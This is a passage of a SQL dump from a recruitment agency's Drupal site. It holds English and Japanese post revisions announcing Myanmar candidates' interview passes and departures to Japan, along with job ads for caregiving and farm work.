('activities', 0, 160, 660, 'ja', 0, '<p data-start=\"1078\" data-end=\"1095\"><strong data-start=\"1078\" data-end=\"1095\">日本でのキャリアへの第一歩</strong></p><p data-start=\"1097\" data-end=\"1172\">ニューコメット・トレーディング・エージェンシーは、TOE TOE HLAING さんが特定技能（外食業）の採用面接に合格されたことをご報告いたします。</p><p data-start=\"1174\" data-end=\"1226\">今回の合格は、ご本人の努力と熱心な準備の成果であり、日本で働くという目標に向けた大きな一歩となりました。</p><p data-start=\"1228\" data-end=\"1278\">この素晴らしい成果を心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1280\" data-end=\"1344\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材と日本企業をつなぐ架け橋として支援を続けてまいります。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Tokutei-Gaishoku-Toe-Toe-Hlaing%20%283-2-2026%29.jpg\" data-entity-uuid=\"31db132d-6f42-4390-832c-4f4f7eb9c73c\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 161, 622, 'ja', 0, '<p data-start=\"1162\" data-end=\"1175\"><strong data-start=\"1162\" data-end=\"1175\">面接合格のお知らせ</strong></p><p data-start=\"1177\" data-end=\"1256\">ニューコメット・トレーディング・エージェンシーは、MYAT THANDAR KYAW さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1258\" data-end=\"1314\">このたびの合格は、ご本人の努力と熱心な準備の成果であり、日本での外食業界でのキャリアへの大きな第一歩となります。</p><p data-start=\"1316\" data-end=\"1356\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1358\" data-end=\"1415\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材の育成と日本就職支援に努めてまいります。</p><p data-start=\"1417\" data-end=\"1447\">おめでとうございます。今後のさらなるご成功を願っております。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Tokutei-gaishoku-Myat-Thandar-Kyaw%283-2-26%29_0.jpg\" data-entity-uuid=\"02d5ed4e-00e0-46e9-8048-5921d2b292da\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 161, 623, 'en', 0, '<p data-start=\"266\" data-end=\"300\"><strong data-start=\"266\" data-end=\"300\">Interview Success Announcement</strong></p><p data-start=\"302\" data-end=\"495\">New Comet Trading Agency is pleased to announce that Ms. Myat Thandar Kyaw has successfully passed the interview for a Specified Skilled Worker (Tokutei Ginou – Food Service) position in Japan.</p><p data-start=\"497\" data-end=\"635\">This achievement reflects her dedication, preparation, and determination to pursue a professional career in Japan\'s food service industry.</p><p data-start=\"637\" data-end=\"780\">We sincerely congratulate her on this important milestone and wish her continued success in the upcoming procedures and future career in Japan.</p><p data-start=\"782\" data-end=\"948\">New Comet Trading Agency remains committed to supporting and preparing candidates for employment opportunities in Japan through our recruitment and training programs.</p><p data-start=\"950\" data-end=\"1004\">Congratulations and best wishes for the journey ahead.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Tokutei-gaishoku-Myat-Thandar-Kyaw%283-2-26%29_0.jpg\" data-entity-uuid=\"02d5ed4e-00e0-46e9-8048-5921d2b292da\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 161, 623, 'ja', 0, '<p data-start=\"1162\" data-end=\"1175\"><strong data-start=\"1162\" data-end=\"1175\">面接合格のお知らせ</strong></p><p data-start=\"1177\" data-end=\"1256\">ニューコメット・トレーディング・エージェンシーは、MYAT THANDAR KYAW さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1258\" data-end=\"1314\">このたびの合格は、ご本人の努力と熱心な準備の成果であり、日本での外食業界でのキャリアへの大きな第一歩となります。</p><p data-start=\"1316\" data-end=\"1356\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1358\" data-end=\"1415\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材の育成と日本就職支援に努めてまいります。</p><p data-start=\"1417\" data-end=\"1447\">おめでとうございます。今後のさらなるご成功を願っております。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Tokutei-gaishoku-Myat-Thandar-Kyaw%283-2-26%29_0.jpg\" data-entity-uuid=\"02d5ed4e-00e0-46e9-8048-5921d2b292da\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 161, 657, 'en', 0, '<p data-start=\"266\" data-end=\"300\"><strong data-start=\"266\" data-end=\"300\">Interview Success Announcement</strong></p><p data-start=\"302\" data-end=\"495\">New Comet Trading Agency is pleased to announce that Ms. Myat Thandar Kyaw has successfully passed the interview for a Specified Skilled Worker (Tokutei Ginou – Food Service) position in Japan.</p><p data-start=\"497\" data-end=\"635\">This achievement reflects her dedication, preparation, and determination to pursue a professional career in Japan\'s food service industry.</p><p data-start=\"637\" data-end=\"780\">We sincerely congratulate her on this important milestone and wish her continued success in the upcoming procedures and future career in Japan.</p><p data-start=\"782\" data-end=\"948\">New Comet Trading Agency remains committed to supporting and preparing candidates for employment opportunities in Japan through our recruitment and training programs.</p><p data-start=\"950\" data-end=\"1004\">Congratulations and best wishes for the journey ahead.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Tokutei-gaishoku-Myat-Thandar-Kyaw%283-2-26%29_0.jpg\" data-entity-uuid=\"02d5ed4e-00e0-46e9-8048-5921d2b292da\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 161, 657, 'ja', 0, '<p data-start=\"1162\" data-end=\"1175\"><strong data-start=\"1162\" data-end=\"1175\">面接合格のお知らせ</strong></p><p data-start=\"1177\" data-end=\"1256\">ニューコメット・トレーディング・エージェンシーは、MYAT THANDAR KYAW さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1258\" data-end=\"1314\">このたびの合格は、ご本人の努力と熱心な準備の成果であり、日本での外食業界でのキャリアへの大きな第一歩となります。</p><p data-start=\"1316\" data-end=\"1356\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1358\" data-end=\"1415\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材の育成と日本就職支援に努めてまいります。</p><p data-start=\"1417\" data-end=\"1447\">おめでとうございます。今後のさらなるご成功を願っております。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Tokutei-gaishoku-Myat-Thandar-Kyaw%283-2-26%29_0.jpg\" data-entity-uuid=\"02d5ed4e-00e0-46e9-8048-5921d2b292da\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 161, 658, 'en', 0, '<p data-start=\"266\" data-end=\"300\"><strong data-start=\"266\" data-end=\"300\">Interview Success Announcement</strong></p><p data-start=\"302\" data-end=\"495\">New Comet Trading Agency is pleased to announce that Ms. Myat Thandar Kyaw has successfully passed the interview for a Specified Skilled Worker (Tokutei Ginou – Food Service) position in Japan.</p><p data-start=\"497\" data-end=\"635\">This achievement reflects her dedication, preparation, and determination to pursue a professional career in Japan\'s food service industry.</p><p data-start=\"637\" data-end=\"780\">We sincerely congratulate her on this important milestone and wish her continued success in the upcoming procedures and future career in Japan.</p><p data-start=\"782\" data-end=\"948\">New Comet Trading Agency remains committed to supporting and preparing candidates for employment opportunities in Japan through our recruitment and training programs.</p><p data-start=\"950\" data-end=\"1004\">Congratulations and best wishes for the journey ahead.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Tokutei-gaishoku-Myat-Thandar-Kyaw%283-2-26%29_0.jpg\" data-entity-uuid=\"02d5ed4e-00e0-46e9-8048-5921d2b292da\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 161, 658, 'ja', 0, '<p data-start=\"1162\" data-end=\"1175\"><strong data-start=\"1162\" data-end=\"1175\">面接合格のお知らせ</strong></p><p data-start=\"1177\" data-end=\"1256\">ニューコメット・トレーディング・エージェンシーは、MYAT THANDAR KYAW さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1258\" data-end=\"1314\">このたびの合格は、ご本人の努力と熱心な準備の成果であり、日本での外食業界でのキャリアへの大きな第一歩となります。</p><p data-start=\"1316\" data-end=\"1356\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1358\" data-end=\"1415\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材の育成と日本就職支援に努めてまいります。</p><p data-start=\"1417\" data-end=\"1447\">おめでとうございます。今後のさらなるご成功を願っております。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Tokutei-gaishoku-Myat-Thandar-Kyaw%283-2-26%29_0.jpg\" data-entity-uuid=\"02d5ed4e-00e0-46e9-8048-5921d2b292da\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 161, 659, 'en', 0, '<p data-start=\"266\" data-end=\"300\"><strong data-start=\"266\" data-end=\"300\">Interview Success Announcement</strong></p><p data-start=\"302\" data-end=\"495\">New Comet Trading Agency is pleased to announce that Ms. Myat Thandar Kyaw has successfully passed the interview for a Specified Skilled Worker (Tokutei Ginou – Food Service) position in Japan.</p><p data-start=\"497\" data-end=\"635\">This achievement reflects her dedication, preparation, and determination to pursue a professional career in Japan\'s food service industry.</p><p data-start=\"637\" data-end=\"780\">We sincerely congratulate her on this important milestone and wish her continued success in the upcoming procedures and future career in Japan.</p><p data-start=\"782\" data-end=\"948\">New Comet Trading Agency remains committed to supporting and preparing candidates for employment opportunities in Japan through our recruitment and training programs.</p><p data-start=\"950\" data-end=\"1004\">Congratulations and best wishes for the journey ahead.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Tokutei-gaishoku-Myat-Thandar-Kyaw%283-2-26%29_0.jpg\" data-entity-uuid=\"02d5ed4e-00e0-46e9-8048-5921d2b292da\" data-entity-type=\"file\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 161, 659, 'ja', 0, '<p data-start=\"1162\" data-end=\"1175\"><strong data-start=\"1162\" data-end=\"1175\">面接合格のお知らせ</strong></p><p data-start=\"1177\" data-end=\"1256\">ニューコメット・トレーディング・エージェンシーは、MYAT THANDAR KYAW さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1258\" data-end=\"1314\">このたびの合格は、ご本人の努力と熱心な準備の成果であり、日本での外食業界でのキャリアへの大きな第一歩となります。</p><p data-start=\"1316\" data-end=\"1356\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1358\" data-end=\"1415\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材の育成と日本就職支援に努めてまいります。</p><p data-start=\"1417\" data-end=\"1447\">おめでとうございます。今後のさらなるご成功を願っております。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Tokutei-gaishoku-Myat-Thandar-Kyaw%283-2-26%29_0.jpg\" data-entity-uuid=\"02d5ed4e-00e0-46e9-8048-5921d2b292da\" data-entity-type=\"file\">', '', 'full_html'),
('announcement', 0, 162, 624, 'en', 0, '<p data-start=\"381\" data-end=\"447\"><strong data-start=\"381\" data-end=\"447\">Specified Skilled Worker (Kaigo) – Home Care Position in Japan</strong></p><p data-start=\"449\" data-end=\"603\">New Comet Trading Agency is pleased to introduce an exciting employment opportunity for qualified caregivers seeking to build a long-term career in Japan.</p><p data-start=\"605\" data-end=\"915\">Unlike conventional nursing home or care facility positions, this Home Care (訪問介護) role involves providing direct care and support to elderly individuals in their own homes. This profession is highly respected in Japan and offers a rewarding opportunity to make a meaningful difference in people\'s daily lives.</p><p data-start=\"917\" data-end=\"964\"><strong data-start=\"917\" data-end=\"933\">Job Location</strong><br>Aichi Prefecture (Nagoya Area)</p><p data-start=\"966\" data-end=\"990\"><strong data-start=\"966\" data-end=\"990\">Job Responsibilities</strong></p><p data-start=\"992\" data-end=\"1247\">• Meal preparation and assistance with daily nutrition<br>• Bathing and personal care support<br>• Assistance with walking and wheelchair mobility<br>• Housekeeping, laundry, and shopping support<br>• Accompanying clients to hospitals and medical appointments</p><p data-start=\"1249\" data-end=\"1272\"><strong data-start=\"1249\" data-end=\"1272\">Salary and Benefits</strong></p><p data-start=\"1274\" data-end=\"1530\">• Basic Salary: 210,000 Yen per month<br>• Expected Monthly Income: Approximately 230,000 Yen or more including overtime and bonuses<br>• Housing Cost: Approximately 35,000 Yen per month<br>• Days Off: Two days per week<br>• Working Hours: Shift-based schedule</p><p data-start=\"1532\" data-end=\"1548\"><strong data-start=\"1532\" data-end=\"1548\">Requirements</strong></p><p data-start=\"1550\" data-end=\"1725\">• JLPT N2 Certificate<br>• Tokutei Ginou Kaigo Certificate<br>• Strong commitment to building a long-term career in Japan<br>• Responsible, patient, and compassionate personality</p><p data-start=\"1727\" data-end=\"1790\">Applicants with caregiving experience will be given preference.</p><p data-start=\"1792\" data-end=\"1889\">Interested candidates are encouraged to contact New Comet Trading Agency for further information.</p><p data-start=\"1792\" data-end=\"1889\">&nbsp;</p><img src=\"/sites/default/files/inline-images/N2%20Kaigo%20Job%20Offer.jpg\" data-entity-uuid=\"97f3d438-a4d8-4b63-8254-1477a26ce407\" data-entity-type=\"file\">', '', 'full_html'),
('announcement', 0, 162, 625, 'en', 0, '<p data-start=\"381\" data-end=\"447\"><strong data-start=\"381\" data-end=\"447\">Specified Skilled Worker (Kaigo) – Home Care Position in Japan</strong></p><p data-start=\"449\" data-end=\"603\">New Comet Trading Agency is pleased to introduce an exciting employment opportunity for qualified caregivers seeking to build a long-term career in Japan.</p><p data-start=\"605\" data-end=\"915\">Unlike conventional nursing home or care facility positions, this Home Care (訪問介護) role involves providing direct care and support to elderly individuals in their own homes. This profession is highly respected in Japan and offers a rewarding opportunity to make a meaningful difference in people\'s daily lives.</p><p data-start=\"917\" data-end=\"964\"><strong data-start=\"917\" data-end=\"933\">Job Location</strong><br>Aichi Prefecture (Nagoya Area)</p><p data-start=\"966\" data-end=\"990\"><strong data-start=\"966\" data-end=\"990\">Job Responsibilities</strong></p><p data-start=\"992\" data-end=\"1247\">• Meal preparation and assistance with daily nutrition<br>• Bathing and personal care support<br>• Assistance with walking and wheelchair mobility<br>• Housekeeping, laundry, and shopping support<br>• Accompanying clients to hospitals and medical appointments</p><p data-start=\"1249\" data-end=\"1272\"><strong data-start=\"1249\" data-end=\"1272\">Salary and Benefits</strong></p><p data-start=\"1274\" data-end=\"1530\">• Basic Salary: 210,000 Yen per month<br>• Expected Monthly Income: Approximately 230,000 Yen or more including overtime and bonuses<br>• Housing Cost: Approximately 35,000 Yen per month<br>• Days Off: Two days per week<br>• Working Hours: Shift-based schedule</p><p data-start=\"1532\" data-end=\"1548\"><strong data-start=\"1532\" data-end=\"1548\">Requirements</strong></p><p data-start=\"1550\" data-end=\"1725\">• JLPT N2 Certificate<br>• Tokutei Ginou Kaigo Certificate<br>• Strong commitment to building a long-term career in Japan<br>• Responsible, patient, and compassionate personality</p><p data-start=\"1727\" data-end=\"1790\">Applicants with caregiving experience will be given preference.</p><p data-start=\"1792\" data-end=\"1889\">Interested candidates are encouraged to contact New Comet Trading Agency for further information.</p><p data-start=\"1792\" data-end=\"1889\">&nbsp;</p><img src=\"/sites/default/files/inline-images/N2%20Kaigo%20Job%20Offer.jpg\" data-entity-uuid=\"97f3d438-a4d8-4b63-8254-1477a26ce407\" data-entity-type=\"file\">', '', 'full_html'),
('announcement', 0, 162, 625, 'ja', 0, '<p data-start=\"2051\" data-end=\"2073\"><strong data-start=\"2051\" data-end=\"2073\">特定技能（介護）訪問介護スタッフ募集</strong></p><p data-start=\"2075\" data-end=\"2145\">ニューコメット・トレーディング・エージェンシーでは、日本で長期的なキャリア形成を目指す介護人材の皆様に、訪問介護のお仕事をご紹介いたします。</p><p data-start=\"2147\" data-end=\"2224\">本求人は介護施設勤務とは異なり、ご利用者様のご自宅を訪問し、日常生活のサポートを行うお仕事です。日本社会において高く評価されている介護サービスの一つです。</p><p data-start=\"2226\" data-end=\"2233\"><strong data-start=\"2226\" data-end=\"2233\">勤務地</strong></p><p data-start=\"2235\" data-end=\"2246\">愛知県（名古屋エリア）</p><p data-start=\"2248\" data-end=\"2256\"><strong data-start=\"2248\" data-end=\"2256\">業務内容</strong></p><p data-start=\"2258\" data-end=\"2329\">• 食事の準備および介助<br>• 入浴・身体介護<br>• 歩行や車椅子移動のサポート<br>• 掃除・洗濯・買い物支援<br>• 通院時の付き添い</p><p data-start=\"2331\" data-end=\"2340\"><strong data-start=\"2331\" data-end=\"2340\">給与・待遇</strong></p><p data-start=\"2342\" data-end=\"2432\">• 基本給：210,000円／月<br>• 想定月収：230,000円以上（残業代・賞与含む）<br>• 住宅費：約35,000円／月<br>• 休日：週2日<br>• 勤務時間：シフト制</p><p data-start=\"2434\" data-end=\"2442\"><strong data-start=\"2434\" data-end=\"2442\">応募条件</strong></p><p data-start=\"2444\" data-end=\"2522\">• JLPT N2合格者<br>• 特定技能（介護）資格保持者<br>• 日本で長期的なキャリア形成を希望する方<br>• 責任感があり、思いやりを持って働ける方</p><p data-start=\"2524\" data-end=\"2538\">介護経験者は優遇いたします。</p><p data-start=\"2540\" data-end=\"2584\">詳細については、ニューコメット・トレーディング・エージェンシーまでお問い合わせください。</p><p data-start=\"1792\" data-end=\"1889\">&nbsp;</p><img src=\"/sites/default/files/inline-images/N2%20Kaigo%20Job%20Offer.jpg\" data-entity-uuid=\"97f3d438-a4d8-4b63-8254-1477a26ce407\" data-entity-type=\"file\">', '', 'full_html'),
('announcement', 0, 163, 626, 'en', 0, '<p><strong>Specified Skilled Worker (Agriculture) Job Opportunity in Japan</strong></p><p>New Comet Trading Agency is currently recruiting candidates for an Agriculture Specified Skilled Worker (Tokutei Ginou) position in Japan.</p><p>This opportunity is suitable for individuals with agricultural experience who wish to build a long-term career in Japan.</p><p><strong>Work Location</strong></p><p>Tsukuba City, Ibaraki Prefecture, Japan</p><p><strong>Job Responsibilities</strong></p><p>• Green onion (Negi) cultivation and harvesting<br>• Agricultural production and farm management support<br>• Packing and packaging agricultural products<br>• Preparing products for shipment and distribution</p><p><strong>Salary and Benefits</strong></p><p>• Hourly Wage: ¥1,080<br>• Average Monthly Salary: ¥200,000 – ¥250,000<br>• Overtime opportunities available<br>• Potential Monthly Income: Up to approximately ¥300,000 including overtime</p><p><strong>Working Hours</strong></p><p>• Summer Season: Between 5:00 AM and 8:00 PM<br>• 8-hour shift schedule</p><p><strong>Days Off</strong></p><p>• 1 to 2 days per week</p><p><strong>Accommodation</strong></p><p>• Company housing available<br>• Housing Fee: ¥20,000 per month<br>• 1–2 persons per room<br>• Detached house accommodation<br>• Utilities paid according to actual usage</p><p><strong>Requirements</strong></p><p>• JLPT N4 or above<br>• Ability to communicate in daily Japanese conversation<br>• Agricultural work experience preferred<br>• Good physical health</p><p>Applicants with a driver\'s license will be given priority consideration.</p><p>Only six positions are available. Interested candidates are encouraged to apply as soon as possible.</p><p>For further information, please contact New Comet Trading Agency.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/16-6-2026%20-Nougyou.jpg\" data-entity-uuid=\"69bded37-a7a1-4c91-a9d2-fdf230578555\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 163, 627, 'en', 0, '<p><strong>Specified Skilled Worker (Agriculture) Job Opportunity in Japan</strong></p><p>New Comet Trading Agency is currently recruiting candidates for an Agriculture Specified Skilled Worker (Tokutei Ginou) position in Japan.</p><p>This opportunity is suitable for individuals with agricultural experience who wish to build a long-term career in Japan.</p><p><strong>Work Location</strong></p><p>Tsukuba City, Ibaraki Prefecture, Japan</p><p><strong>Job Responsibilities</strong></p><p>• Green onion (Negi) cultivation and harvesting<br>• Agricultural production and farm management support<br>• Packing and packaging agricultural products<br>• Preparing products for shipment and distribution</p><p><strong>Salary and Benefits</strong></p><p>• Hourly Wage: ¥1,080<br>• Average Monthly Salary: ¥200,000 – ¥250,000<br>• Overtime opportunities available<br>• Potential Monthly Income: Up to approximately ¥300,000 including overtime</p><p><strong>Working Hours</strong></p><p>• Summer Season: Between 5:00 AM and 8:00 PM<br>• 8-hour shift schedule</p><p><strong>Days Off</strong></p><p>• 1 to 2 days per week</p><p><strong>Accommodation</strong></p><p>• Company housing available<br>• Housing Fee: ¥20,000 per month<br>• 1–2 persons per room<br>• Detached house accommodation<br>• Utilities paid according to actual usage</p><p><strong>Requirements</strong></p><p>• JLPT N4 or above<br>• Ability to communicate in daily Japanese conversation<br>• Agricultural work experience preferred<br>• Good physical health</p><p>Applicants with a driver\'s license will be given priority consideration.</p><p>Only six positions are available. Interested candidates are encouraged to apply as soon as possible.</p><p>For further information, please contact New Comet Trading Agency.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/16-6-2026%20-Nougyou.jpg\" data-entity-uuid=\"69bded37-a7a1-4c91-a9d2-fdf230578555\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 163, 627, 'ja', 0, '<p data-start=\"1985\" data-end=\"2006\"><strong data-start=\"1985\" data-end=\"2006\">特定技能（農業）求人募集のお知らせ</strong></p><p data-start=\"2008\" data-end=\"2071\">ニューコメット・トレーディング・エージェンシーでは、日本で長期的に働きたい方を対象に、特定技能（農業）人材を募集しております。</p><p data-start=\"2073\" data-end=\"2110\">農業経験を活かしながら、日本で安定したキャリアを築くことができる求人です。</p><p data-start=\"2112\" data-end=\"2119\"><strong data-start=\"2112\" data-end=\"2119\">勤務地</strong></p><p data-start=\"2121\" data-end=\"2128\">茨城県つくば市</p><p data-start=\"2130\" data-end=\"2138\"><strong data-start=\"2130\" data-end=\"2138\">業務内容</strong></p><p data-start=\"2140\" data-end=\"2193\">• ネギの栽培および収穫作業<br>• 農作物の生産管理補助<br>• 箱詰め・包装作業<br>• 出荷準備作業</p><p data-start=\"2195\" data-end=\"2204\"><strong data-start=\"2195\" data-end=\"2204\">給与・待遇</strong></p><p data-start=\"2206\" data-end=\"2280\">• 時給：1,080円<br>• 月収目安：200,000円～250,000円<br>• 残業あり<br>• 残業を含めた月収は約300,000円まで可能</p><p data-start=\"2282\" data-end=\"2290\"><strong data-start=\"2282\" data-end=\"2290\">勤務時間</strong></p><p data-start=\"2292\" data-end=\"2325\">• 夏季：午前5時から午後8時の間<br>• 実働8時間（シフト制）</p><p data-start=\"2327\" data-end=\"2333\"><strong data-start=\"2327\" data-end=\"2333\">休日</strong></p><p data-start=\"2335\" data-end=\"2343\">• 週1日～2日</p><p data-start=\"2345\" data-end=\"2351\"><strong data-start=\"2345\" data-end=\"2351\">住居</strong></p><p data-start=\"2353\" data-end=\"2415\">• 会社寮あり<br>• 寮費：月20,000円<br>• 1部屋1～2名利用<br>• 一戸建てタイプ<br>• 光熱費は実費負担</p><p data-start=\"2417\" data-end=\"2425\"><strong data-start=\"2417\" data-end=\"2425\">応募条件</strong></p><p data-start=\"2427\" data-end=\"2485\">• JLPT N4以上<br>• 日常会話レベルの日本語能力<br>• 農業経験者歓迎<br>• 健康で体力に自信のある方</p><p data-start=\"2487\" data-end=\"2506\">運転免許をお持ちの方は優遇いたします。</p><p data-start=\"2508\" data-end=\"2543\">募集人数は6名限定です。ご興味のある方はお早めにお問い合わせください。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/16-6-2026%20-Nougyou.jpg\" data-entity-uuid=\"69bded37-a7a1-4c91-a9d2-fdf230578555\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 164, 628, 'en', 0, '<p><strong>A New Chapter Begins in Japan</strong></p><p>New Comet Trading Agency is pleased to announce that Ms. Su Myat Win successfully departed for Japan on 14 June 2026 under the Specified Skilled Worker (Hotel) Program.</p><p>This marks an important milestone in her professional journey as she begins a new career in Japan\'s hospitality industry.</p><p>We extend our warmest congratulations and best wishes as she embarks on this exciting opportunity. May her experience in Japan be rewarding, successful, and filled with valuable learning opportunities.</p><p>New Comet Trading Agency remains committed to supporting Myanmar candidates in achieving their goals through international employment opportunities.</p><img src=\"/sites/default/files/inline-images/%2814-6-2026%29%20Su%20Myat%20Win%202.jpg\" data-entity-uuid=\"db69afa8-def5-40a5-9e13-4680a60442b2\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 164, 629, 'en', 0, '<p><strong>A New Chapter Begins in Japan</strong></p><p>New Comet Trading Agency is pleased to announce that Ms. Su Myat Win successfully departed for Japan on 14 June 2026 under the Specified Skilled Worker (Hotel) Program.</p><p>This marks an important milestone in her professional journey as she begins a new career in Japan\'s hospitality industry.</p><p>We extend our warmest congratulations and best wishes as she embarks on this exciting opportunity. May her experience in Japan be rewarding, successful, and filled with valuable learning opportunities.</p><p>New Comet Trading Agency remains committed to supporting Myanmar candidates in achieving their goals through international employment opportunities.</p><img src=\"/sites/default/files/inline-images/%2814-6-2026%29%20Su%20Myat%20Win%202.jpg\" data-entity-uuid=\"db69afa8-def5-40a5-9e13-4680a60442b2\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 164, 629, 'ja', 0, '<p data-start=\"1107\" data-end=\"1122\"><strong data-start=\"1107\" data-end=\"1122\">日本での新たなスタート</strong></p><p data-start=\"1124\" data-end=\"1206\">ニューコメット・トレーディング・エージェンシーは、SU MYAT WIN さんが2026年6月14日に特定技能（宿泊）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1208\" data-end=\"1262\">日本の宿泊業界で新たなキャリアをスタートされることとなり、ご本人にとって大きな節目となる素晴らしい機会です。</p><p data-start=\"1264\" data-end=\"1324\">心よりお祝い申し上げるとともに、日本での生活と仕事が充実したものとなり、多くの経験と成長につながることを願っております。</p><p data-start=\"1326\" data-end=\"1379\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材の海外就労を支援してまいります。</p><p data-start=\"1326\" data-end=\"1379\">&nbsp;</p><img src=\"/sites/default/files/inline-images/%2814-6-2026%29%20Su%20Myat%20Win%202.jpg\" data-entity-uuid=\"db69afa8-def5-40a5-9e13-4680a60442b2\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 165, 630, 'en', 0, '<p><strong>Departure to Japan – 3 June 2026</strong></p><p>New Comet Trading Agency is pleased to announce that four candidates successfully departed for Japan on 3 June 2026 under the Specified Skilled Worker (Kaigo) Program.</p><p>The candidates are:</p><p>• Thae Su Su Aye<br>• Hnin Yu War<br>• Hsu Mon Htet<br>• Shwe Sin Win</p><p>Their departure marks an important milestone after months of preparation, training, and dedication toward building a professional career in Japan\'s caregiving sector.</p><p>We extend our sincere congratulations and wish them success, personal growth, and a rewarding experience in Japan. May they achieve their goals and contribute positively to their workplaces and communities.</p><p>New Comet Trading Agency will continue to support Myanmar workers in pursuing meaningful career opportunities abroad.</p><img src=\"/sites/default/files/inline-images/0-02-05-045c83e0dbab5edb94ed3e02d3b5408f77782f2bc938d4e38c28f1d5e9009d8d_2269c80ab27.jpg\" data-entity-uuid=\"ca3d7c09-57cf-4fd3-9715-ac05967a4311\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-498d41b52747be1914370d778c7266b2519e1c63e048d3d2dc2753b0c61bc4bc_2269c80f4a9_0.jpg\" data-entity-uuid=\"592ef76f-594f-41b3-8101-bef062e3a807\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-5783259c5cb90811be09437c6a25f6b37815d871639b109a28054b0d662b8d5e_2269c815115.jpg\" data-entity-uuid=\"3d109e78-f787-47e2-8256-b38e4d903f44\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-bce8dd32e9c08b6128802b68caada6269fa36b43398e8203c60391414268d774_2269c8083c7.jpg\" data-entity-uuid=\"5fd80362-b637-4ad6-9d68-2f9655a557d8\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-495cfd4813203e14183c65b8fc25f508ea2c4f1611b042edd313a9e2ffc86cab_2269c80aa18.jpg\" data-entity-uuid=\"02b0e92a-9f11-4c6d-8d0a-d74c1bb5130f\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 165, 631, 'en', 0, '<p><strong>Departure to Japan – 3 June 2026</strong></p><p>New Comet Trading Agency is pleased to announce that four candidates successfully departed for Japan on 3 June 2026 under the Specified Skilled Worker (Kaigo) Program.</p><p>The candidates are:</p><p>• Thae Su Su Aye<br>• Hnin Yu War<br>• Hsu Mon Htet<br>• Shwe Sin Win</p><p>Their departure marks an important milestone after months of preparation, training, and dedication toward building a professional career in Japan\'s caregiving sector.</p><p>We extend our sincere congratulations and wish them success, personal growth, and a rewarding experience in Japan. May they achieve their goals and contribute positively to their workplaces and communities.</p><p>New Comet Trading Agency will continue to support Myanmar workers in pursuing meaningful career opportunities abroad.</p><img src=\"/sites/default/files/inline-images/0-02-05-045c83e0dbab5edb94ed3e02d3b5408f77782f2bc938d4e38c28f1d5e9009d8d_2269c80ab27.jpg\" data-entity-uuid=\"ca3d7c09-57cf-4fd3-9715-ac05967a4311\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-498d41b52747be1914370d778c7266b2519e1c63e048d3d2dc2753b0c61bc4bc_2269c80f4a9_0.jpg\" data-entity-uuid=\"592ef76f-594f-41b3-8101-bef062e3a807\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-5783259c5cb90811be09437c6a25f6b37815d871639b109a28054b0d662b8d5e_2269c815115.jpg\" data-entity-uuid=\"3d109e78-f787-47e2-8256-b38e4d903f44\" data-entity-type=\"file\"><p>&nbsp;</p><img 